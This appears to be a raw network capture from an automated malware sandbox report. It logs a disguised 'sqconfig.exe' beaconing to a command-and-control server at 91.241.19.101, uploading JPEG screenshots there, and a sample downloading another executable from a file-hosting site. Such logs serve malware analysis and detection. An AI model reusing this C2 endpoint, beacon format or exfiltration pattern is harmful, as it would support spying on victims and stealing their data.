                                                                  Sep 30, 2021 23:53:21.469556093 CEST15638OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:21.469775915 CEST15640OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:21.596170902 CEST15645OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:21.596366882 CEST15650OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:21.596484900 CEST15655OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:21.596699953 CEST15662OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:21.596729994 CEST15667OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:21.719574928 CEST15676OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:21.719688892 CEST15681OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:21.887074947 CEST15723INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:21 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  95192.168.2.34990791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:21.771857977 CEST15721OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:21.963844061 CEST15724INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:21 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  96192.168.2.34991091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:22.216306925 CEST15726OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:22.216466904 CEST15726OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:22.216799021 CEST15736OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:22.217024088 CEST15739OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:22.339696884 CEST15743OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:22.340014935 CEST15751OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:22.340071917 CEST15754OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:22.340285063 CEST15759OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:22.340529919 CEST15766OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:22.461513042 CEST15772OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:22.461585045 CEST15785OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:53:22.663450956 CEST15816INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:22 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  97192.168.2.34990991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:22.230629921 CEST15739OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:22.430649996 CEST15766INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:22 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  98192.168.2.34991291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:22.673635006 CEST15816OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:22.844978094 CEST15817INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:22 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:53:22.882388115 CEST15818OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:22.882661104 CEST15818OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:22.883028030 CEST15828OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:22.883327961 CEST15831OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:23.009797096 CEST15842OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:23.009865046 CEST15845OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:23.010112047 CEST15850OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:23.010252953 CEST15853OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:23.010344028 CEST15858OUTData Raw: c7 87 18 ff 00 d3 33 5e 2f 7e df be 73 fe d1 af 3b 28 5e f4 cf 7b 39 77 f6 7e 87 a1 59 71 f0 ee 0f a8 fe 75 cc c9 5d 25 a1 c7 c3 bb 6f 73 fd 6b 97 95 c8 27 da b4 c2 2f 7a 7e ac e4 cc dd 94 3d 11 13 92 0f 06 90 4b 20 e8 e4 7e 34 84 e6 9b 5e 8d 91
                                                                  Data Ascii: 3^/~s;(^{9w~Yqu]%osk'/z~=K ~4^;NrgOXoE.Hu,i'AMkI>bq+[2wqVE~5lCT<GsMu5XO-&<Jii-iD'kg/TF5W+9+zO7:&r#
                                                                  Sep 30, 2021 23:53:23.137779951 CEST15863OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:53:23.138277054 CEST15873OUTData Raw: 21 cc 8b f5 ae 1c 27 f0 5f ab 3e 8e af c6 bd 11 ec fa a7 1a 16 93 ff 00 5c 47 f2 ac 5e f5 b7 ab 71 a3 69 43 fe 98 8f e4 2b 0e b9 70 bf c3 fb ca c7 ff 00 1b ee 17 14 b8 34 99 a5 cd 74 9c 61 4f 14 ca 50 6a 46 89 29 69 a0 d2 f7 a4 5a 14 53 85 37 34
                                                                  Data Ascii: !'_>\G^qiC+p4taOPjF)iZS74H;((R!iT!HRLu0Z&* qR)C5C\T8u)yz5_7uCj-JP;Y0M&MsQQ(7xxt+2JQQo
                                                                  Sep 30, 2021 23:53:23.328869104 CEST15907INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:23 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  99192.168.2.34991391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:23.092631102 CEST15860OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:23.289972067 CEST15907INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:23 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.34975669.39.225.3443C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2021-09-30 21:52:27 UTC0OUTGET /llbjiv.exe HTTP/1.0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko)
                                                                  Accept: */*
                                                                  Host: a.pomf.cat


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  169.39.225.3443192.168.2.349756C:\Users\user\Desktop\Ac372JNTO6.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2021-09-30 21:52:27 UTC0INHTTP/1.1 200 OK
                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                  Date: Thu, 30 Sep 2021 21:52:27 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 5886456
                                                                  Connection: close
                                                                  Last-Modified: Tue, 14 Sep 2021 21:26:41 GMT
                                                                  ETag: "61411391-59d1f8"
                                                                  Age: 0
                                                                  X-Cache: MISS
                                                                  X-Cache-Hits: 0
                                                                  Accept-Ranges: bytes
                                                                  2021-09-30 21:52:27 UTC0INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                  Data Ascii: MZP@!L!This program must be run under Win32$7
